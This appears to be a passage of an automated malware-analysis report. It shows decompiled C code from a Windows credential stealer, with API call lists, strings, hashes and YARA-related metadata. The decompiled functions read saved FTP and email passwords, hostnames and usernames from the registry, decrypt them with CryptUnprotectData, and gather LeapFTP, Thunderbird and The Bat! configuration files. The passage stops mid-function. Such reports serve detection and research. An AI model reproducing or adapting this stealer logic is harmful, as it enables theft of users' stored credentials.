0x00403b5f
0x00403b61
0x00403b62
0x00403b6c
0x00403b75
0x00403b79
0x00403b7b
0x00403b83
0x00403b83
0x00403b85
0x00403b8c
0x00403b87
0x00403b87
0x00403b87
0x00403b91
0x00403b92
0x00403b96
0x00403b96
0x00403b97
0x00403b98
0x00403b9b
0x00403ba0
0x00403ba4
0x00403ba6
0x00403ba6
0x00403bb6
0x00403bc3
0x00403bc3
0x00403bc5
0x00403bc9
0x00403bcb
0x00403bd8
0x00403bdb
0x00403bdd
0x00403bdf
0x00403bdf
0x00403bdd
0x00403bcb
0x00000000
0x00403bc5
0x00403bec
0x00403bf2
0x00403bfc

APIs

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403B00
lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403B11
StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403B32
StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403B49
lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403B5A

Strings

Location:, xrefs: 00403B41, 00403B55
Content-Length:, xrefs: 00403AF8, 00403B0C

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$AllocLocal
String ID: Content-Length:$Location:
API String ID: 2140729754-2400408565
Opcode ID: ccb7a4c1303ead18c923505439b5974798f3e24fec900223be994b98bc23a5a7
Instruction ID: 887c3a052e585dbf08982f6133b0250286a7e5dbb1d34c025ab1b04810de1b55
Opcode Fuzzy Hash: ccb7a4c1303ead18c923505439b5974798f3e24fec900223be994b98bc23a5a7
Instruction Fuzzy Hash: 9541D731A04249BBDB10AFA5CC45F9DFF79EF80309F208177B510B52D1C7799A51DA54

Uniqueness

Uniqueness Score: -1.00%

Function 00406D4F, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406D4F(void* __ecx, intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char _v2092;
				long _t48;
				long _t49;
				long _t52;
				intOrPtr* _t64;

				_t48 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t52 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t53 = _t52;
						if(_t52 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t53, _a8, "\\"),  &_v2064);
						E004018B8(_t54);
						_v2080 = E00401D71( *0x414869, _v2068, "Password",  &_v2092);
						_v2072 = E00401D71( *0x414869, _v2068, "Hostname", 0);
						_v2076 = E00401D71( *0x414869, _v2068, "Username", 0);
						_t64 = E00401D71( *0x414869, _v2068, "Port",  &_v2088);
						if(_t64 == 0 || _v2088 != 4) {
							_t65 = _t64;
							if(_t64 != 0) {
								E004018B8(_t65);
							}
							_v2084 = 0x15;
						} else {
							 *_t22 =  *_t64;
							E004018B8(_t64);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0 && E004043DC(_v2080,  &_v2092, 0) != 0 && _v2092 != 0) {
							E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076);
							E0040159F(_a4, _v2080, _v2092);
							E00401569(_a4, _v2084);
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

0x00406d65
0x00406d6a
0x00406d6c
0x00406d72
0x00406d79
0x00406d79
0x00406d99
0x00406d9e
0x00406da0
0x00000000
0x00000000
0x00406dc4
0x00406dca
0x00406dec
0x00406e0a
0x00406e28
0x00406e4b
0x00406e4d
0x00406e68
0x00406e6a
0x00406e6d
0x00406e6d
0x00406e72
0x00406e58
0x00406e5a
0x00406e61
0x00406e61
0x00406e83
0x00406edc
0x00406ef0
0x00406efe
0x00406efe
0x00406f09
0x00406f14
0x00406f1f
0x00406f2a
0x00406f2f
0x00406f2f
0x00000000
0x00406f3a
0x00406f40

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406D65
RegEnumKeyExA.ADVAPI32 ref: 00406D99
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406F3A

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

Port, xrefs: 00406E35
Password, xrefs: 00406DD6
Username, xrefs: 00406E12
Hostname, xrefs: 00406DF4

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: Hostname$Password$Port$Username
API String ID: 3369285772-1811172798
Opcode ID: 11b58eb076e21b69a1e4d97b53ebb1a2393ccb16412e4d1246237f188232d0c9
Instruction ID: 500b27a2afeee4adcaf2e15fb58aabb2ec7cde25314abd0c379f5f2d99b47613
Opcode Fuzzy Hash: 11b58eb076e21b69a1e4d97b53ebb1a2393ccb16412e4d1246237f188232d0c9
Instruction Fuzzy Hash: 6041043590011CEADF216B61CC02BEDBAB9BF44304F10C5BAB149740F1DB7A5BA1AF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406B1B, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B1B(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				long _t43;
				long _t44;
				long _t47;
				intOrPtr* _t58;

				_t43 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t44 = _t43;
				if(_t44 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t47 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t48 = _t47;
						if(_t47 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t48, _a8, "\\"),  &_v2064);
						E004018B8(_t49);
						_v2080 = E00401D71( *0x414869, _v2068, "Password", 0);
						_v2072 = E00401D71( *0x414869, _v2068, "Server", 0);
						_v2076 = E00401D71( *0x414869, _v2068, "Username", 0);
						_t58 = E00401D71( *0x414869, _v2068, "FtpPort",  &_v2088);
						if(_t58 == 0 || _v2088 != 4) {
							_t59 = _t58;
							if(_t58 != 0) {
								E004018B8(_t59);
							}
							_v2084 = 0x15;
						} else {
							 *_t21 =  *_t58;
							E004018B8(_t58);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080);
							E00401569(_a4, _v2084);
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t44;
			}

0x00406b31
0x00406b36
0x00406b38
0x00406b3e
0x00406b45
0x00406b45
0x00406b65
0x00406b6a
0x00406b6c
0x00000000
0x00000000
0x00406b90
0x00406b96
0x00406bb3
0x00406bd1
0x00406bef
0x00406c12
0x00406c14
0x00406c2f
0x00406c31
0x00406c34
0x00406c34
0x00406c39
0x00406c1f
0x00406c21
0x00406c28
0x00406c28
0x00406c4a
0x00406c90
0x00406c9e
0x00406c9e
0x00406ca9
0x00406cb4
0x00406cbf
0x00406cca
0x00406ccf
0x00406ccf
0x00000000
0x00406cda
0x00406ce0

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406B31
RegEnumKeyExA.ADVAPI32 ref: 00406B65
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406CDA

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

Password, xrefs: 00406B9D
Username, xrefs: 00406BD9
Server, xrefs: 00406BBB
FtpPort, xrefs: 00406BFC

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: FtpPort$Password$Server$Username
API String ID: 3369285772-1828875246
Opcode ID: 4b81514aff49bcdc6a24a146f02ba94d292b69dfe4c5f9afe9a9a02f5e1b98b0
Instruction ID: 7ba9846cf84e593e36bc471b668ef0c5a307549365de809292626744771520ce
Opcode Fuzzy Hash: 4b81514aff49bcdc6a24a146f02ba94d292b69dfe4c5f9afe9a9a02f5e1b98b0
Instruction Fuzzy Hash: BE41F43194011CEADF21AB61CC02BDD7AB9FF44304F10C5BAB549740F1DB795AA1AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E237, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E237(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				unsigned int _v32;
				long _t50;
				long _t51;

				_t50 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t51 = _t50;
				if(_t51 != 0) {
					return _t51;
				}
				_v12 = E00401D71(_a4, _a8, "Site", 0);
				_v16 = E00401D71(_a4, _a8, "UserID", 0);
				_v20 = E00401D71(_a4, _a8, "xflags",  &_v32);
				_v24 = E00401D71(_a4, _a8, "Port", 0);
				_v28 = E00401D71(_a4, _a8, "Folder", 0);
				if(_v20 != 0 && _v32 != 0 && E00402B0D(_v20, _v32) != 0) {
					_v32 = _v32 >> 1;
					if(E004043DC(_v20,  &_v32, 0) != 0 && _v12 != 0 && _v16 != 0 && _v20 != 0) {
						E004015CB(E004015CB(E00401569(_a12, 0xbeef0000), _a12, _v12), _a12, _v16);
						E004015CB(E004015CB(E0040159F(_a12, _v20, _v32), _a12, _v24), _a12, _v28);
					}
				}
				E004018B8(_v12);
				E004018B8(_v16);
				E004018B8(_v20);
				E004018B8(_v24);
				E004018B8(_v28);
				return RegCloseKey(_v8);
			}

0x0040e247
0x0040e24c
0x0040e24e
0x0040e37d
0x0040e37d
0x0040e266
0x0040e27b
0x0040e292
0x0040e2a7
0x0040e2bc
0x0040e2c3
0x0040e2de
0x0040e2f1
0x0040e323
0x0040e347
0x0040e347
0x0040e2f1
0x0040e34f
0x0040e357
0x0040e35f
0x0040e367
0x0040e36f
0x00000000

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E247
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E377

Part of subcall function 004043DC: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
Part of subcall function 004043DC: LocalFree.KERNEL32(00000000), ref: 0040445C

Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7

Strings

Folder, xrefs: 0040E2AC
Port, xrefs: 0040E297
UserID, xrefs: 0040E26B
xflags, xrefs: 0040E282
Site, xrefs: 0040E256

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
String ID: Folder$Port$Site$UserID$xflags
API String ID: 2167297517-269738940
Opcode ID: 27a5410a2a34defe9eb4fbb078d41bd6a33cc389f29d2b866d8a81b3b4d7f2d5
Instruction ID: 29f1f953e1c0832a404ddd4bf1eb832a089b214c1547d71922d0550bed25c438
Opcode Fuzzy Hash: 27a5410a2a34defe9eb4fbb078d41bd6a33cc389f29d2b866d8a81b3b4d7f2d5
Instruction Fuzzy Hash: 7E31A73591010ABADF126F92CC02FEEBF76AF04344F10853AB920751F1D77A9A60EB48

Uniqueness

Uniqueness Score: -1.00%

Function 004078C8, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004078C8(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				long _t39;
				long _t40;
				long _t43;

				_t39 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t40 = _t39;
				if(_t40 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t43 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t44 = _t43;
						if(_t43 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t44, _a12, "\\"),  &_v2064);
						E004018B8(_t45);
						_v2072 = E00401D71(_a8, _v2068, "InstallPath", 0);
						_v2076 = E00401D71(_a8, _v2068, "DataDir", 0);
						if(_v2072 != 0) {
							E00404351(_a4, _v2072, "sites.dat", 0xbeef0000);
							E00404351(_a4, _v2072, "sites.ini", 0xbeef0001);
						}
						if(_v2076 != 0) {
							E00404351(_a4, _v2076, "sites.dat", 0xbeef0000);
							E00404351(_a4, _v2076, "sites.ini", 0xbeef0001);
						}
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004078C8(_a4, _a8, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t40;
			}

0x004078db
0x004078e0
0x004078e2
0x004078e8
0x004078ef
0x004078ef
0x0040790f
0x00407914
0x00407916
0x00000000
0x00000000
0x0040793a
0x00407940
0x0040795a
0x00407975
0x00407982
0x00407997
0x004079af
0x004079af
0x004079bb
0x004079d0
0x004079e8
0x004079e8
0x004079f3
0x004079fe
0x00407a0f
0x00407a1a
0x00407a1f
0x00407a1f
0x00000000
0x00407a2a
0x00407a30

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078DB
RegEnumKeyExA.ADVAPI32 ref: 0040790F
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A2A

Strings

InstallPath, xrefs: 00407947
sites.ini, xrefs: 004079A1, 004079DA
DataDir, xrefs: 00407962
sites.dat, xrefs: 00407989, 004079C2

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DataDir$InstallPath$sites.dat$sites.ini
API String ID: 1332880857-3870687875
Opcode ID: 362131b18f64d95850ad3324091aff6a7822ff3789688bb0b819df8fcd119598
Instruction ID: e7b8c0c935d4d0c454aa1f99ca68a1ed178d52b45ef830c738b4bbc260966493
Opcode Fuzzy Hash: 362131b18f64d95850ad3324091aff6a7822ff3789688bb0b819df8fcd119598
Instruction Fuzzy Hash: 4531F43194011CFADF216B51CC42FDD7ABABF40304F14C0BABA54740A1CBB96B91AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F81F, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F81F(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t28;
				void* _t30;

				_t30 = __eflags;
				_t28 = __ecx;
				_v8 = E004015F0(_a4, 0x5f, 0);
				 *0x416030 = 2;
				GetCurrentDirectoryA(0x104,  &_v269);
				E00409C3C(_t28, _a4,  *0x414869, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				E00409C3C(_t28, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				SetCurrentDirectoryA( &_v269);
				 *0x416030 = 3;
				GetCurrentDirectoryA(0x104,  &_v269);
				E00409C3C(_t28, _a4,  *0x414869, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
				E00409C3C(_t28, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
				SetCurrentDirectoryA( &_v269);
				return E00401636(__ebx, _t28, __edi, _t30, _a4, _v8);
			}

0x0040f81f
0x0040f81f
0x0040f834
0x0040f837
0x0040f84d
0x0040f86a
0x0040f886
0x0040f892
0x0040f897
0x0040f8ad
0x0040f8ca
0x0040f8e6
0x0040f8f2
0x0040f903

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F84D

Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F892
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F8AD
SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F8F2

Strings

\Thunderbird, xrefs: 0040F852, 0040F86F, 0040F8B2, 0040F8CF
Software\Mozilla, xrefs: 0040F85C, 0040F879, 0040F8BC, 0040F8D9
Thunderbird, xrefs: 0040F857, 0040F874, 0040F8B7, 0040F8D4

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Software\Mozilla$Thunderbird$\Thunderbird
API String ID: 3062143572-138716004
Opcode ID: f06d37bfe171a568b370491e0634d08446b017f874cf0aa5a1507adbf09138d6
Instruction ID: 97e5a13185e0f9c508a72f46a089416fd48b8e24879e356ae91fef65a2890253
Opcode Fuzzy Hash: f06d37bfe171a568b370491e0634d08446b017f874cf0aa5a1507adbf09138d6
Instruction Fuzzy Hash: 60111F30788208BADF11BB61CC43FCD7A75AB10748F508466B648751E3DBF99AD49B48

Uniqueness

Uniqueness Score: -1.00%

Function 00407A7F, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00407A7F(void* __ebx, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				char* _t22;
				void* _t26;
				void* _t28;
				char* _t31;
				void* _t33;
				void* _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				char* _t41;
				char* _t42;

				_t39 = __ecx;
				_t38 = __ebx;
				_v8 = E004015F0(_a4, 0x1b, 0);
				_t42 =  *0x4147ed; // 0x640b38
				_t41 =  *0x4147f1; // 0x645e80
				if( *_t41 == 0) {
					L10:
					E00407A33(_t47, _a4, 0x1a); // executed
					E00407A33(_t47, _a4, 0x23); // executed
					E00407A33(_t47, _a4, 0x1c); // executed
					E004078C8(_a4,  *0x414869, "SOFTWARE\\LeapWare"); // executed
					E004078C8(_a4, 0x80000002, "SOFTWARE\\LeapWare"); // executed
					return E00401636(_t38, _t39, _t41, _t47, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t22 = StrStrA(_t42, "unleap.exe");
					if(_t22 == 0) {
						__eflags = StrStrIA(_t41, "leapftp");
						if(__eflags != 0) {
							_t26 = E0040242B(__eflags, _t42);
							_push(_t26);
							E00404351(_a4, _t26, "sites.dat", 0xbeef0000);
							_t28 = _t26;
							E00404351(_a4, _t28, "sites.ini", 0xbeef0001);
							E004018B8();
						}
					} else {
						_t31 = _t22 + 1;
						_t45 =  *_t31;
						if( *_t31 != 0) {
							_push(_t31);
							_push("unleap.exe");
							L0041066A();
							_pop(_t40);
							_t33 = E0040242B(_t45, _t31 + _t40);
							_push(_t33);
							E00404351(_a4, _t33, "sites.dat", 0xbeef0000);
							_t35 = _t33;
							E00404351(_a4, _t35, "sites.ini", 0xbeef0001);
							E004018B8();
						}
					}
					while( *_t42 != 0) {
						_t42 =  &(_t42[1]);
						__eflags = _t42;
					}
					_t42 =  &(_t42[1]);
					asm("cld");
					_t39 = 0xffffffff;
					asm("repne scasb");
					_t47 =  *_t41;
				} while ( *_t41 != 0);
				goto L10;
			}

0x00407a7f
0x00407a7f
0x00407a93
0x00407a96
0x00407a9c
0x00407aa5
0x00407b66
0x00407b6b
0x00407b75
0x00407b7f
0x00407b92
0x00407ba4
0x00407bb7
0x00000000
0x00000000
0x00000000
0x00407aab
0x00407aab
0x00407ab6
0x00407ab8
0x00407b13
0x00407b15
0x00407b18
0x00407b1d
0x00407b2d
0x00407b32
0x00407b41
0x00407b46
0x00407b46
0x00407aba
0x00407aba
0x00407abb
0x00407abe
0x00407ac4
0x00407ac5
0x00407aca
0x00407acf
0x00407ad3
0x00407ad8
0x00407ae8
0x00407aed
0x00407afc
0x00407b01
0x00407b01
0x00407abe
0x00407b4e
0x00407b4d
0x00407b4d
0x00407b4d
0x00407b53
0x00407b54
0x00407b57
0x00407b5c
0x00407b5e
0x00407b5e
0x00000000

APIs

StrStrA.SHLWAPI(00640B38,unleap.exe), ref: 00407AB1
lstrlen.KERNEL32(unleap.exe,00000001,00640B38,unleap.exe), ref: 00407ACA

Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

StrStrIA.SHLWAPI(00645E80,leapftp,00640B38,unleap.exe), ref: 00407B0E

Strings

SOFTWARE\LeapWare, xrefs: 00407B84, 00407B97
leapftp, xrefs: 00407B08
unleap.exe, xrefs: 00407AAB, 00407AC5
sites.ini, xrefs: 00407AF3, 00407B38
sites.dat, xrefs: 00407ADF, 00407B24

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
API String ID: 1884169789-1497043051
Opcode ID: 5300ff160b27690eb6490a884dddbaa25e25ba5e465f0f872f45c6ffda6eae1a
Instruction ID: 386b857961e923e72b6bd9048734cec28c80f28d71c9641b52c3ac27aeea778a
Opcode Fuzzy Hash: 5300ff160b27690eb6490a884dddbaa25e25ba5e465f0f872f45c6ffda6eae1a
Instruction Fuzzy Hash: 0C217571A48104BDEF113B22CC02FEE7E1ADB81748F244437B905B51E2C7BDAB91969D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF6C, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EF6C(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				intOrPtr _v20;
				char _v60;
				char _v64;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr _t47;
				intOrPtr _t53;
				void* _t62;

				_t36 = E00401D71(_a8, "Software\\RIT\\The Bat!", "Working Directory", 0); // executed
				_t37 = _t36;
				if(_t37 != 0) {
					_v8 = _t37;
					E0040EEF7(_a4, _v8);
					E004018B8(_v8);
				}
				_t38 = E00401D71(_a8, "Software\\RIT\\The Bat!", "ProgramDir", 0); // executed
				_t39 = _t38;
				if(_t39 != 0) {
					_v8 = _t39;
					E0040EEF7(_a4, _v8);
					E004018B8(_v8);
				}
				_t40 = E00401D71(_a8, "Software\\RIT\\The Bat!\\Users depot", "Default", 0); // executed
				_t41 = _t40;
				if(_t41 != 0) {
					_v8 = _t41;
					E0040EEF7(_a4, _v8);
					E004018B8(_v8);
				}
				_t43 = E00401D71(_a8, "Software\\RIT\\The Bat!\\Users depot", "Count",  &_v16); // executed
				_t44 = _t43;
				if(_t44 != 0) {
					_v12 = _t44;
					if(_v16 != 4) {
						L17:
						return E004018B8(_v12);
					}
					_t47 =  *_v12;
					if(_t47 > 0x2710) {
						_t47 = 0x2710;
					}
					_v20 = _t47;
					while(_v20 != 0) {
						wsprintfA( &_v60, "Dir #%d", _v20);
						_t62 = _t62 + 0xc;
						_t53 = E00401D71(_a8, "Software\\RIT\\The Bat!\\Users depot",  &_v60,  &_v64);
						if(_t53 != 0) {
							_v8 = _t53;
							if(_v64 > 3) {
								E0040EEF7(_a4, _v8);
							}
							E004018B8(_v8);
						}
						_v20 = _v20 - 1;
					}
					goto L17;
				}
				return _t44;
			}

0x0040ef81
0x0040ef86
0x0040ef88
0x0040ef8a
0x0040ef93
0x0040ef9b
0x0040ef9b
0x0040efaf
0x0040efb4
0x0040efb6
0x0040efb8
0x0040efc1
0x0040efc9
0x0040efc9
0x0040efdd
0x0040efe2
0x0040efe4
0x0040efe6
0x0040efef
0x0040eff7
0x0040eff7
0x0040f00d
0x0040f012
0x0040f014
0x0040f016
0x0040f01d
0x0040f087
0x00000000
0x0040f08a
0x0040f022
0x0040f029
0x0040f02b
0x0040f02b
0x0040f030
0x0040f081
0x0040f041
0x0040f046
0x0040f05e
0x0040f060
0x0040f062
0x0040f069
0x0040f071
0x0040f071
0x0040f079
0x0040f079
0x0040f07e
0x0040f07e
0x00000000
0x0040f081
0x0040f090

APIs

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

wsprintfA.USER32 ref: 0040F041

Strings

Software\RIT\The Bat!\Users depot, xrefs: 0040EFD5, 0040F005, 0040F051
Dir #%d, xrefs: 0040F038
Default, xrefs: 0040EFD0
Working Directory, xrefs: 0040EF74
Count, xrefs: 0040F000
ProgramDir, xrefs: 0040EFA2
Software\RIT\The Bat!, xrefs: 0040EF79, 0040EFA7

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
API String ID: 988369812-1921698578
Opcode ID: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
Instruction ID: cd3023906f6ae057e5bdde1cd0ba176c3d04abf87e76bd78a7c681664f89a6ca
Opcode Fuzzy Hash: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
Instruction Fuzzy Hash: 50313A34E40209FADF11AFA1DC42EEE7A75AF00304F6085B7F410B51E1DB798BA5AB48

Uniqueness

Uniqueness Score: -1.00%

Function 00404C51, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C51(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				CHAR* _v12;
